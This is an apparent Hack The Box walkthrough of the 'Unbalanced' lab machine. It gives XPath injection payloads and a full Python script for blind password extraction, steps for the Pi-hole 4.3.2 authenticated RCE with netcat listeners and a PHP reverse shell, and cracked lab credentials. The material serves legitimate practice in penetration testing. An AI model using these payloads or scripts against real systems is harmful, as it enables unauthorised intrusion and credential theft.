Unbalanced — HTB Walkthrough
Well, totally a hard machine, required a lots of nudges and help. Also it took some scripting and XPATH injection and hell of a ride. Without wasting time let’s start.
ENUMERATION
Nmap scan for unbalanced using default scripts and service versions we see.
Port 873 Rsync Enumeration
Using the guide from : https://book.hacktricks.xyz/pentesting/873-pentesting-rsync, we can find the shares. “Conf_backups” which is EncFS-encrypted Configurations Backups.
Trying to enumerate conf_backups doesn’t show auth required so we can list down the shares and also copy contents
To list down what is in conf_backups
Now we will download all files in a folder on our machine
We get all files on our local system
Determining file types of each file I see Data
But among all these is an xml file. Which seems to be the low hanging fruit lets enumerate it
Opening this xml file shows us , what encryption is used
So we have got here encryption types and all the details to decrypt it. We see it is an EncFs encrypted file system.
Let us try to decrypt it
But you see we will need a secret password for the same. So we will try to crack password using john
Encfs2John
We will send whole folder rsync , copied to encrypted , to encfs2john.
A file is created in the folder unbalanced
Now we will use rockyou.txt to crack it
We have got the password. : bubblegum. Now let us create a decrypted system. For this we will first create encrypted directory on
We got the decrypted file system . How ??
The encfs system has a syntax which is used for both encryption and decryption.
We use the file system by mounting it to ROOTDir(the one which we want to encrypt ) . Then we say encfs to create an encrypted file system under name encrypted and we supply password for it + AES encryption like salt and all.
This creates all encrypted files on system + keeps an .encfs.xml file to store password and salt for AES decryption
In the case we have lost our password the only way is to bruteforce it, which we did above, by JTR
Now we again used encfs specifying encrypted and decrypted File systems on ROOTDir
Then supply the password we cracked. This creates the missing decrypted file system , and thus we have recovered our decrypted files. Let’s go back to enumeration
After I cracked the files , I started enumerating it
1) Squid.conf has
a. Domain name && b. Cachemgr password : Thah$Sh1
Lets’ add intranet.unbalanced.htb to host file and move to squid enumeration
PORT 3128 Squid Proxy Enumeration
1) cat /etc/proxychains.conf
2) On browser using foxy-proxy , I made a Proxy named Joker. Which has host 10.10.10.200 and port 3128
Then we access intranet.unbalanced.htb
I tried entering username : cachemgr, Manager or root with password Tha$Sha1
Now after trying to login in, or doing some enum on website I found nothing much. So I asked for a hint and was told to utilize squidclient to know what else can be done using manager password
So we will access mgr menu, and for this we will use squidcleint
We see here any query to disabled status vectors doesn’t work. So I tried enumerating each protected data
Fqdn revealed following
So what it tells is presence of two new hosts. Similarly I enumerated objects
We see here admin page present on website hosted on 172.31.11.3
We see here pihole.unbalanced.htb, Version Info : Pi-hole Version v4.3.2 Web Interface Version v4.3 FTL Version v4.3.1
Also we see 172.13.179.1 is not there . Traversing to which shows site taken down due to security
On traversing to intranet.php , we find the same page , but this page will be vulnerable as this host is mentioned to be
Then I tried to do some simple SQL attacks which were looking to be working , but there was something missing, like if syntax was not what we expected. So digging up more gave Xpath injection
https://www.scip.ch/en/?labs.20180802
Username : ‘ or 1=1 or ‘’=’
Password : Thah$Sha1 or anything
Revealed all usernames
Now to guess the password , we will first guess the length of password
Username : Bryan
Password : ‘] | //*[1][string-length(Password) = ‘7’] | /foo[bar’=
We will do hit and trial in password length , for this we need to make a python script let say, which send value of password length increasing one at a time.
For this capture the request on burp to see , request format
Now we make script
Script
#!/usr/bin/env pythonimport requestsimport stringcharacters = string.printablehttp_proxy = "http://10.10.10.200:3128"proxy_dict = {"http":http_proxy}target_url = "http://172.31.179.1/intranet.php"password = ""end = " "user_no = 3 # Change this to the user number you wantpassword_length = 0def send_request(payload):data = {"Username":"manager","Password":payload}response = requests.post(target_url,data=data,proxies=proxy_dict)return responsefor length in range(1, 101):print("\rTrying :" + str(length) + end)length_payload = "'] | //*[" + str(user_no) + "][string-length(Password) = " + str(length) + "] | /foo [bar = '"temp = send_request(length_payload)if "Invalid credentials." not in temp.text:password_length = lengthprint("\nLength of the password is : " + str(length) + "\n")breakfor i in range(1,password_length + 1):for j in characters:if j != "'":print("\rChecking position " + str(i) + " for character: " + str(j),end)payload = "']|//*[" + str(user_no) + "][substring(Password," + str(i) + ",1) = '" + str(j) + "'] | /foo [bar = '"response = send_request(payload)if "Invalid credentials." not in response.text:print("\nPasswords " + str(i) + " character is : " + str(j))password = password + str(j)breakprint("\nThe password is : " + str(password))
username : bryan && Password : ireallyl0vebubblegum!!!
Great , so I tried SSH and got the shell
EXPLOITATION
Enumerating more
So we see here two things
1) Left task for users are : To set intranet-host 1 back to load balancer
2) To set up Pi-Hole server
— — — Juicy Info : Pi-Hole is running on local interface
— — — Pi-Hole has admin password set somewhere
I did dpkg -l , to list all the packages. and saw wget is allowed to run. So I transferred netstat from my kali to the machine
On attacker machine
On victim machine
We can see two ports attached to local host and any one on them is docker. So we did transfer ifconfig, the same way we did netstat
Running ifconfig shows docker is on interface 172.17.0.1, but as per to-do list, pi-hole is accessible only through local host
So now we will try to set up a SSH tunnel. First I tried to setup tunnel through kali — — Local port forwarding
ssh -L 8888:127.0.0.1:8080 bryan@10.10.10.200
and traversing through 127.0.0.1:8888 gave me
I wasn’t convinced . I thought there might be some tunneling issues, wrong directions, so I tried reverse tunneling from victim machine
For this we need to add our kali public key to authorized_keys in victim machine
first create directory .ssh in bryan’s home folder and then, transfer your authorized_keys to victims’ ssh folder
First create ssh keys on kali using ssh-keygen, if not done, then
on attacker machine
and on victim machine
Make sure that you run the ssh server on kali
Port forwarding
in netstat output we can see, 10.10.10.200 has established an ssh connection to 10.10.14.18 port 22. Browsing to server
Now that we have pi-hole page, we can find the version exploit for pi-hole 4.3.2 which is an authenticated RCE. To execute that we need to authenticate ourselves. Enumerating admin username password on machine
1) I tried all basic files for pi-hole like /usr/local/bin/pihole, /etc/pihole, but there was nothing
2) Also there was docker folder in /etc/ which had key.json. I tried to find something but none of interest.
after all this I went back to TODO ,and found
1) set temporary admin password
o first I tried user: pi password : raspberry
2) then I realized being dumb, it was admin that was the password
Authenticate to Pi-Hole page
Now to exploit the RCE , just download python script from here
https://www.exploit-db.com/exploits/48727
and run on attacker machine
PRIVILEGE ESCALATION
Enumerating for root
I found a web password , nothing much, we will use this
https://frichetten.com/blog/cve-2020-11108-pihole-rce/#pk_campaign=github
first open settings →blocklist — -> disable all present blocklists
then add new URL
Open netcat listener on at port 80 on attacker machine, then click save and update
we receive a response on netcat.
Now we will send the data as follows and hit enter twice, then ctrl +c
as soon as we hit ctrl+c, we get the following output on server
Now we will again set a netcat listener on at port 80
and click “Update” to update Gravity a second time. This time you should see “.domains” in the response. This is indicative you have performed the exploit correctly up to this point. Hit enter, and then paste whatever PHP payload you’d like. A shell function call works very nicely. Then hit Ctrl+c to kill netcat.
The above php code is php-reverse-shell.php from pentest monkey, Now we turn our listener on at port 1234'
Then we press ctrl+c , on http response. We see following on server
Now we run pihole change password command from www-data
and on netcat
Downloaded both the files on my system
on attacker machine
Opening both the files, I found a password in pihole_config.sh
Then I used su root , to switch to root and used this password and we get root
bUbBl3gUm$43v3Ry0n3!
ROOTED !!!